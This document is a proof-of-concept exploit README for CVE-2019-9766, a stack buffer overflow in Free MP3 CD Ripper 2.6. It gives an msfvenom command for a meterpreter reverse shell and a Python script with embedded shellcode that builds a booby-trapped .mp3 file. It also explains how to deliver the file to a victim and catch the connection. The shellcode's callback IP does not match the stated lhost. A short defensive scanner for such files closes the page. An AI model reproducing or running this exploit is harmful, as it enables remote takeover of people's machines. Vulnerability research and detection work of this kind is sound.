
CVE-2019-9766 PoC: Free MP3 CD Ripper buffer error vulnerability

Associated Vulnerability
Title: Free MP3 CD Ripper buffer error vulnerability (CVE-2019-9766)
Description: Stack-based buffer overflow in Free MP3 CD Ripper 2.6, when converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .mp3 file.
Description
Free MP3 CD Ripper 2.6 contains a stack-based buffer overflow (CVE-2019-9766); a remote attacker can exploit it by means of a crafted .mp3 file to execute arbitrary code.
Readme
# CVE-2019-9766

Free MP3 CD Ripper 2.6 contains a buffer overflow vulnerability. By constructing a special MP3 file, an attacker turns the audio file into a lure: when the user opens it in the player, the buffer overflow is triggered and arbitrary code is executed.

## Reproduction

Attacker machine: kali201903 (192.168.198.142)

Victim machine: Windows 10 21H1 (192.168.198.137)

Install Free MP3 CD Ripper 2.6 on the victim machine, then on the Kali machine use MSF (msfvenom) to generate reverse-connection shellcode:

```bash
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.142 lport=888 -f c --smallest
```

![image-20220914095217904](https://user-images.githubusercontent.com/65578786/190044303-edef1acf-b5e3-47dc-a0bf-f3713f4a2e45.png)

Replace the payload (the `buf` byte string) in the script below with the payload generated above:

```python
# Stack-based buffer overflow in Free MP3 CD Ripper 2.6 (CVE-2019-9766)
#
# Layout of the crafted file: 4116 bytes of filler reach the SEH record
# on the stack; the nSEH slot is overwritten with a short jump (EB 06)
# that skips the 4-byte handler address (SEH) and lands on a small NOP
# sled followed by the msfvenom reverse_tcp shellcode in `buf`.
# Byte strings and binary mode keep the file content byte-for-byte
# identical under both Python 2 and Python 3.

buffer = b"A" * 4116
NSEH = b"\xeb\x06\x90\x90"   # jmp short +6 over the SEH address
SEH = b"\x84\x20\xe4\x66"    # overwritten exception handler address
nops = b"\x90" * 5
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
buf += b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
buf += b"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
buf += b"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
buf += b"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
buf += b"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
buf += b"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
buf += b"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
buf += b"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x6e\x84"
buf += b"\x68\x02\x00\x03\x78\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
buf += b"\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
buf += b"\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
buf += b"\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += b"\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"

# pad the tail so the section after SEH is always 316 bytes long
pad = b"B" * (316 - len(nops) - len(buf))
payload = buffer + NSEH + SEH + nops + buf + pad
try:
    f = open("Test_Free_MP3.mp3", "wb")
    print("[+] Creating %d-byte mp3 file..." % len(payload))
    f.write(payload)
    f.close()
    print("[+] mp3 file created successfully!")
except IOError as e:
    print("File cannot be created: %s" % e)
```

Run the script to generate a .mp3 file:

![image-20220914095432399](https://user-images.githubusercontent.com/65578786/190044366-e7e2f51c-8e05-466b-ad1b-cc9ac7727e94.png)

Move this mp3 file to the victim machine, then start the MSF console on the Kali machine and set the parameters as follows:

![image-20220914095709754](https://user-images.githubusercontent.com/65578786/190044401-94d4d22e-ede8-469c-bc4e-70f33aebb64d.png)

Once configured, start the listener; open the mp3 file with the software on the victim machine and the reverse shell comes back:

![image-20220914100209829](https://user-images.githubusercontent.com/65578786/190044428-25c43ec2-f191-495e-84f4-08e141981579.png)

**Note**: this only works with the Kali 2019 release; Kali 2020 and later fail (related to the MSF version). It also has to be Windows 10; verification on Windows 7 failed (both 64-bit).
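From the defender's side the crafted file has a recognisable shape: no ID3 tag or MPEG frame sync at offset 0, a run of 4116 identical filler bytes, a short jump (EB 06) in the nSEH slot and a NOP sled right after the 4-byte SEH address. The heuristic scanner below is an added example for this page, not code from the original PoC; `scan_mp3`, the `MIN_RUN` threshold and the two constructed sample blobs are assumptions of this example.

```python
# Added example: heuristic scanner for .mp3 files shaped like the
# CVE-2019-9766 PoC (hypothetical helper, not part of the original PoC).
from typing import List, Tuple

NSEH_OFFSET = 4116   # filler length the PoC uses before the nSEH slot
MIN_RUN = 1024       # assumed threshold: a run this long of one byte is suspicious


def longest_run(data: bytes) -> Tuple[int, int]:
    """Return (length, byte_value) of the longest run of one byte."""
    best_len, best_byte, cur = 0, -1, 0
    for i, b in enumerate(data):
        cur = cur + 1 if i and data[i - 1] == b else 1
        if cur > best_len:
            best_len, best_byte = cur, b
    return best_len, best_byte


def has_mp3_header(data: bytes) -> bool:
    """True for an ID3v2 tag or an MPEG frame sync (first 11 bits set)."""
    if data[:3] == b"ID3":
        return True
    return len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0


def scan_mp3(data: bytes) -> List[str]:
    """Return a list of findings; an empty list means nothing matched."""
    findings = []
    if not has_mp3_header(data):
        findings.append("no ID3/MPEG header at offset 0")
    run_len, run_byte = longest_run(data[:NSEH_OFFSET + 64])
    if run_len >= MIN_RUN:
        findings.append("filler run of %d x 0x%02x" % (run_len, run_byte))
    # nSEH slot: EB 06 is a short jump over the 4-byte handler address
    if data[NSEH_OFFSET:NSEH_OFFSET + 2] == b"\xeb\x06":
        findings.append("short jump (EB 06) at nSEH offset %d" % NSEH_OFFSET)
    # 5-byte NOP sled follows the 4-byte SEH handler address
    if data[NSEH_OFFSET + 8:NSEH_OFFSET + 13] == b"\x90" * 5:
        findings.append("NOP sled after SEH handler address")
    return findings


# Constructed samples: a minimal ID3-tagged file and the PoC's layout
# with placeholder bytes where the handler address and shellcode would be.
BENIGN = b"ID3\x03\x00\x00\x00\x00\x00\x0a" + b"\x00" * 10 + b"\xff\xfb\x90\x00" + b"\x00" * 400
CRAFTED = b"A" * 4116 + b"\xeb\x06\x90\x90" + b"XXXX" + b"\x90" * 5 + b"\xcc" * 300

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(name, scan_mp3(blob) or "clean")
```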

Reference: https://www.code456.com/article/1464254.html